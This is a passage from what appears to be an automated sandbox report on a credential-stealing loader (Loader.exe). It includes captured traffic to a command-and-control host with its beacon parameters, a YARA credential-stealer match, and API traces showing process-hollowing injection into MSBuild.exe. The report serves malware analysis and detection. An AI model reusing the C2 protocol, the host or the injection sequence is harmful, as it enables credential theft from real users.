1f fd a2 20 ce 23 94 3d 4f 6a a0 ea Data Ascii: Gow> W"p4ONx>Lm\|G8%z ?iC=}U+-svUo9(1/Aa$D?}]8EgjD%qK;lG6}O$aJ3{\|6'1J^\|Yc1"HF,ZeoT81;K' #=Oj
2024-12-28 03:14:13 UTC	15331	OUT	Data Raw: b6 cb 0d 1f 3d 77 60 06 55 2f 4d 7e 91 30 f2 26 df 24 6c 57 11 80 b0 2a 47 62 f8 4f 26 ed 06 0e 93 d9 82 b5 d2 c2 77 54 ac 36 bc ff 29 8c 8e a5 fa 53 79 c4 47 f5 29 0a 64 19 be 13 da 63 49 47 5c cd 82 02 e6 77 92 fb f7 6c 35 3a eb c1 bd 89 42 e1 60 c9 3e e1 47 b0 e7 d3 78 26 27 dd f0 6f 28 42 68 fb 75 22 dd 59 0f 40 5c a1 2f dc e5 be 77 9c 91 14 5a aa 06 28 bc dd 7f 5d 0a f4 84 ef cc 3b df f4 e4 03 e8 79 5a b7 0c 72 29 ef ee be 9e ff 79 7f f9 c8 1d 99 97 b9 f9 e5 ca b7 19 91 b8 5b 10 63 a5 95 a4 50 c5 9c af f8 bf 93 82 ec 5e 3a 46 9c 17 02 6f d3 f3 fb c7 65 23 15 25 e3 8f d7 87 23 a4 25 42 71 f3 02 d8 64 db 40 19 30 b9 60 6b 89 2b e4 e0 4b 7f 5b 4a 50 ab f5 dc 65 38 6b 94 61 16 b7 1b 5f be d0 6c 81 90 3e e7 91 a7 f0 27 da c2 31 00 7f d9 39 8f 54 81 86 07 Data Ascii: =w`U/M~0&$lW*GbO&wT6)SyG)dcIG\wl5:B`>Gx&'o(Bhu"Y@\/wZ(];yZr)y[cP^:Foe#%#%Bqd@0`k+K[JPe8ka_l>'19T
2024-12-28 03:14:13 UTC	15331	OUT	Data Raw: 05 52 de 3b a5 c2 90 7f cf 68 2d 7c 54 e7 fd d7 77 d5 bb ea 95 6e 38 8f d3 87 87 55 46 98 69 ff cc a7 e8 57 2e ce ea 6c 65 d0 f0 f0 02 e7 d7 d2 80 43 ef 01 43 5c ec 7f 21 a3 96 1b b8 66 c6 f4 2c db 9f b2 d6 6e 37 3e 7c 8f 9d 6e 46 43 8a d5 eb a9 a1 aa 4e 93 ee 5c c5 9d 36 dd 6f 90 b2 79 c7 6e 82 c4 6c 0d f8 f2 6a 4f 68 0d f7 53 7a cb fb 73 b6 2b dd 0f 2f dc 6f 7a 63 7d 7e 74 ac a2 93 db b2 c4 2a 3a 67 d7 aa b1 1e 9f 66 3e ea 77 71 91 81 e1 f6 be eb 5d 71 1f 68 bd fe 14 4e 9c 62 16 2d 30 60 c6 c2 aa 61 93 1c f5 55 4c 88 75 bc 16 30 9d 7b 05 82 33 5a aa 0f 87 36 b8 cc 3d 99 c9 ca 36 a8 0a c8 47 96 2b 6f fa 7e b8 75 8e e7 5b df fd d1 97 e9 9c c7 e9 dd cb 64 7f 7d e6 f0 6b 8c c9 1e f0 f6 c1 9d 31 2f 3f a7 3f c8 1d 19 0e 7d ca 36 3a 95 fb 39 63 d9 9a 98 7e 50 Data Ascii: R;h-\|Twn8UFiW.leCC\!f,n7>\|nFCN\6oynljOhSzs+/ozc}~t*:gf>wq]qhNb-0`aULu0{3Z6=6G+o~u[d}k1/??}6:9c~P
2024-12-28 03:14:13 UTC	15331	OUT	Data Raw: 94 c2 94 7c a4 1b 0e c4 8a f2 02 e4 c0 fa cd 23 9d ad 2d 8e 26 33 2f a5 4a 84 e0 4f 82 21 5d dd 7f f7 8d 51 8e 81 74 09 32 da 5b bd ca bb 43 1b 14 3f 70 c9 b5 bd 02 02 a6 41 bd 29 8d 57 b0 55 31 c2 04 0d bf 9d 00 af d6 b6 60 4b 35 a1 ab bf 8f 0d c8 08 bd ba 82 da d4 43 02 35 aa f6 e2 f0 bf 5a 1c f5 85 b1 60 54 a8 2d b2 91 38 71 19 ca a4 be 42 01 a9 a5 c5 d4 7c 62 39 c2 ff 0a c1 95 00 ab 39 4e 30 1d b6 92 73 e3 74 19 1b 57 5d e3 fc 51 7d fe 5f eb 68 60 fd 00 f3 48 d3 e9 2e ce b9 93 ed 8b 8d 0d 2e 33 d8 93 f6 39 cb 7c bc e4 44 d1 b4 98 d7 37 f0 69 f8 71 04 61 ed 5e 30 1c 8f f4 ec 78 cc 78 5d 9b 28 32 31 f1 c4 28 62 80 e1 8e bd fd 31 5c 01 7d 05 95 bc cc 3f a0 32 3b 46 93 82 ba 9e 4b 24 ac 4b ad f9 08 65 5e 88 e5 84 b3 fc ed a0 4f 62 f6 12 d6 2d 9b 75 c7 6b Data Ascii: \|#-&3/JO!]Qt2[C?pA)WU1`K5C5Z`T-8qB\|b99N0stW]Q}_h`H..39\|D7iqa^0xx](21(b1\}?2;FK$Ke^Ob-uk
2024-12-28 03:14:13 UTC	15331	OUT	Data Raw: be 9b 28 4a 4b 6c cb df bf 23 f9 92 d0 de dd 42 bc 0a a4 8a 0f 6b e3 96 66 17 bd be b8 b0 9a 82 a3 a8 03 bb 39 2e 20 2c 89 7c 5e 28 9d 78 50 41 23 27 d8 6d 97 c8 f1 d5 00 be c5 c7 d1 b0 d8 90 f3 c6 fd 1f 4e 21 b3 d2 a8 f9 93 38 db ea f9 63 d5 67 d6 ee 89 de 95 a8 76 ec 38 78 a5 b3 ae a0 48 60 f0 eb e0 23 83 e2 84 5a e6 c3 5e 53 32 56 4c 2d d0 b5 7b b2 9c 19 f2 6e ac fa f8 9b 5e 82 93 dc fd 27 a9 73 db 65 0d a4 4f f3 4c 9e 36 ad 2f 51 41 65 af 7c dd 5e 33 e3 ce a9 7c 72 6a 63 ba f3 4d ca d2 7f 09 a9 0b bd b3 97 5f 4e 26 a9 05 fd 68 bd f4 ae 37 c0 e9 ef 24 bb a5 f1 f8 92 77 79 91 77 a5 64 a4 e7 9e f2 41 a3 93 ec 51 b9 ca c9 40 a3 0c a3 8a ba d7 9b 4f 67 39 8b e4 9b 3f ac 83 32 48 39 e7 86 06 5e b4 3b 2f 4e 92 9b df 85 0c f3 e4 ae 77 a5 c5 bd 49 fd 45 fd f5 Data Ascii: (JKl#Bkf9. ,\|^(xPA#'mN!8cgv8xH`#Z^S2VL-{n^'seOL6/QAe\|^3\|rjcM_N&h7$wywdAQ@Og9?2H9^;/NwIE
2024-12-28 03:14:16 UTC	1134	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 03:14:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=204fhe7j5oqd2uvo0p9cjg0lrm; expires=Tue, 22 Apr 2025 21:00:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axRR3A5TadX8T6b9J%2BDivXLkUJHeOOFsgzkaFN6HNE2Fe7PXUlvCtSAF6FRppfmyghy18dzo4SEwit1PPgr%2BoLJBmh5%2BwZ8ie0RiR77yNyA9lYHOXokI1vtElNfe8WoVZhwmGl4p"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8e61057e3942e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4135&min_rtt=2426&rtt_var=2131&sent=318&recv=610&lost=0&retrans=0&sent_bytes=2850&recv_bytes=588231&delivery_rate=1203627&cwnd=241&unsent_bytes=0&cid=9da44662ae1cd849&ts=2376&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49718	172.67.132.7	443	5396	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 03:14:17 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 89 Host: cureprouderio.click
2024-12-28 03:14:17 UTC	89	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65 61 69 64 7a 26 6a 3d 26 68 77 69 64 3d 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--hubcpvkeaidz&j=&hwid=FAD730AECC011CA38246926E533C64D7
2024-12-28 03:14:18 UTC	1121	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 03:14:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d1h87adcvjkcp12ad5cc8biuun; expires=Tue, 22 Apr 2025 21:00:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D15izNpFvUglqpCLgngoB%2BZYrhEQS4mBx1VtvdJFz3PX6F4z1h8WJKzcpLqzlfgT312DE3frfL3m9avkNhAR8UYITgV7MpAxCy6tE911rPy1wijdnIuE8SAbJYe6H8xOi7UQW9N9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8e611ceecf8c48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1828&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=992&delivery_rate=1582655&cwnd=215&unsent_bytes=0&cid=910000e8bdf2fa9b&ts=762&x=0"
2024-12-28 03:14:18 UTC	54	IN	Data Raw: 33 30 0d 0a 35 45 43 6b 4b 52 73 5a 6a 42 78 79 34 46 50 31 63 4c 76 35 39 67 76 58 6e 44 52 43 2f 56 44 62 76 78 55 63 68 74 54 78 57 34 57 2f 48 51 3d 3d 0d 0a Data Ascii: 305ECkKRsZjBxy4FP1cLv59gvXnDRC/VDbvxUchtTxW4W/HQ==
2024-12-28 03:14:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	22:13:55
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0xa60000
File size:	572'456 bytes
MD5 hash:	89C77BCE077F8E9DA11C4D6A6C496DB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:13:55
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:13:56
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0xa60000
File size:	572'456 bytes
MD5 hash:	89C77BCE077F8E9DA11C4D6A6C496DB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	1%
Signature Coverage:	3.7%
Total number of Nodes:	801
Total number of Limit Nodes:	24

Executed Functions

Function 00A9A19E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A9A110,00A9A100), ref: 00A9A334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00A9A347
Wow64GetThreadContext.KERNEL32(000000A0,00000000), ref: 00A9A365
ReadProcessMemory.KERNELBASE(0000009C,?,00A9A154,00000004,00000000), ref: 00A9A389
VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 00A9A3B4
WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 00A9A40C
WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 00A9A457
WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 00A9A495
Wow64SetThreadContext.KERNEL32(000000A0,00910000), ref: 00A9A4D1
ResumeThread.KERNELBASE(000000A0), ref: 00A9A4E0

Strings

ResumeThread, xrefs: 00A9A2D8
ReadProcessMemory, xrefs: 00A9A289
CreateProcessW, xrefs: 00A9A250
GetThreadContext, xrefs: 00A9A276
aryA, xrefs: 00A9A1E2
Load, xrefs: 00A9A1DA
ress, xrefs: 00A9A226
SetThreadContext, xrefs: 00A9A2C2
WriteProcessMemory, xrefs: 00A9A2AF
VirtualAllocEx, xrefs: 00A9A29C
VirtualAlloc, xrefs: 00A9A263
GetP, xrefs: 00A9A21E
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00A9A333
TerminateProcess, xrefs: 00A9A3C3

Memory Dump Source

Source File: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: f5a3eb99b66f9a8db2a8a73044ae6ccee5d65214a079fca05d1e58d24bc1f8b9
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: 68B1F67664064AAFDB60CF68CC80BDA73E5FF88714F158125EA08AB341D774FA51CB94

Function 00A61FB0 Relevance: 9.2, APIs: 6, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A61240: _strlen.LIBCMT ref: 00A612BA

CreateFileA.KERNELBASE ref: 00A62036
GetFileSize.KERNEL32(00000000,00000000), ref: 00A62046
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00A6206B
CloseHandle.KERNELBASE(00000000), ref: 00A6207A
_strlen.LIBCMT ref: 00A620CD
CloseHandle.KERNEL32(00000000), ref: 00A621FD

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: File$CloseHandle_strlen$CreateReadSize
String ID:
API String ID: 2911764282-0
Opcode ID: 12ed7e9d1fc913ce74998b00e1f852d06ecfc5f1920e18b6ec82d85e97643611
Instruction ID: f9dfcd79ecc4fb36fd59339d90cfed842ed2653c4f0da184a95053e8f49ab613
Opcode Fuzzy Hash: 12ed7e9d1fc913ce74998b00e1f852d06ecfc5f1920e18b6ec82d85e97643611
Instruction Fuzzy Hash: 8171D0B2D006189FCB10DFA8DC44BAEBBB5FF49320F184629E815B7391E7359945CBA1

Function 00A61000 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3a3861aa74b00f9e110c2c3ff19c387152b35f0b7a5f4fc315bc4b480e06d9
Instruction ID: feb989187430ccf86363e8719cdb3e2e0cb913bc1f7d232487719da0ee0ac22c
Opcode Fuzzy Hash: 4d3a3861aa74b00f9e110c2c3ff19c387152b35f0b7a5f4fc315bc4b480e06d9
Instruction Fuzzy Hash: B7213A336141A50B8B9C9F386DA2037FF6ADB866A070A573AED129F2D1E521DD1082E4

Function 00A624B0 Relevance: 10.6, APIs: 7, Instructions: 83
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 00A624DD
ShowWindow.USER32(00000000,00000000), ref: 00A624E6
GetCurrentThreadId.KERNEL32 ref: 00A62524

Part of subcall function 00A6F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00A6253A,?,?,00000000), ref: 00A6F129
Part of subcall function 00A6F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00A6253A,?,?,00000000), ref: 00A6F142
Part of subcall function 00A6F11D: CloseHandle.KERNEL32(?,?,?,00A6253A,?,?,00000000), ref: 00A6F154

std::_Throw_Cpp_error.LIBCPMT ref: 00A62567
std::_Throw_Cpp_error.LIBCPMT ref: 00A62578
std::_Throw_Cpp_error.LIBCPMT ref: 00A62589
std::_Throw_Cpp_error.LIBCPMT ref: 00A6259A

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
String ID:
API String ID: 3956949563-0
Opcode ID: 758c6e7597fbeb9957834de4254a19db75fdc814f3959520d2cb21d58a4a22bd
Instruction ID: 29c4f45dba6ae7a393e4c049b3eb0e53760638dce8611630b34c9950a54ab5d2
Opcode Fuzzy Hash: 758c6e7597fbeb9957834de4254a19db75fdc814f3959520d2cb21d58a4a22bd
Instruction Fuzzy Hash: 4D21A6F2D402159BDF10EFE4DD06BDEBBB8AF04710F080125F508BA291E7B6A554CBA2

Function 00A7CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,A877E463,?,00A7D01A,?,?,00000000), ref: 00A7CFCC

Strings

api-ms-, xrefs: 00A7CF62
ext-ms-, xrefs: 00A7CF76

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 53f9f9bcd6beefac87cea917f67799473b82397b6e24dba9fc1eaecf5712e1f0
Instruction ID: a035bb5aa3fb1a46ed4adbaf03e2693470cd42fc26d412159a623982b854405f
Opcode Fuzzy Hash: 53f9f9bcd6beefac87cea917f67799473b82397b6e24dba9fc1eaecf5712e1f0
Instruction Fuzzy Hash: 22210A32B01311ABCB21DBA5DC41A5A776AEF417B0F25C11AF91EE7290DB30ED01C6D0

Function 00A61750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00A61783

Strings

ios_base::failbit set, xrefs: 00A61BEF
ios_base::badbit set, xrefs: 00A61BFA, 00A61C20
ios_base::eofbit set, xrefs: 00A61BEA

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: _strlen
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 4218353326-1866435925
Opcode ID: 4aa337fb7c33b3d3aa20ce6b803985259d88ade1946a1d2b7094f707832c9f65
Instruction ID: 8c038087d7adb4ec4a3fea0282ccd6b1d770f7b1da51c6f88de01de2fb25fd3a
Opcode Fuzzy Hash: 4aa337fb7c33b3d3aa20ce6b803985259d88ade1946a1d2b7094f707832c9f65
Instruction Fuzzy Hash: 4FF15E75A006148FCB14CFA8C494BADBBF1FF88324F198269E815AB3A1D774AD45CF90

Function 00A75349 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 00A75392
GetLastError.KERNEL32(?,?,?,00A62513,00000000,00000000), ref: 00A7539E
__dosmaperr.LIBCMT ref: 00A753A5

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 7f69508cf0e67249ab9d72a8dec54b522daf74c6ec276f385a60e354cb2b6b07
Instruction ID: db3556dcbc8f437d769c9adbf5597ab28ce7b36d2b2daee0b3f48565bd51dbbe
Opcode Fuzzy Hash: 7f69508cf0e67249ab9d72a8dec54b522daf74c6ec276f385a60e354cb2b6b07
Instruction Fuzzy Hash: 09014072905619ABDF159FB4DD25AAE3B65FF00391F10C058F80996160EFF0D951DB50

Function 00A754EE Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A7C2BB: GetLastError.KERNEL32(00000000,?,00A776E9,00A7D306,?,?,00A7C1B7,00000001,00000364,?,00000005,000000FF,?,00A75495,00A98E38,0000000C), ref: 00A7C2BF
Part of subcall function 00A7C2BB: SetLastError.KERNEL32(00000000), ref: 00A7C361

CloseHandle.KERNEL32(?,?,?,00A753D9,?,?,00A754CE,00000000), ref: 00A7551F
FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00A753D9,?,?,00A754CE,00000000), ref: 00A75535
ExitThread.KERNEL32 ref: 00A7553E

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

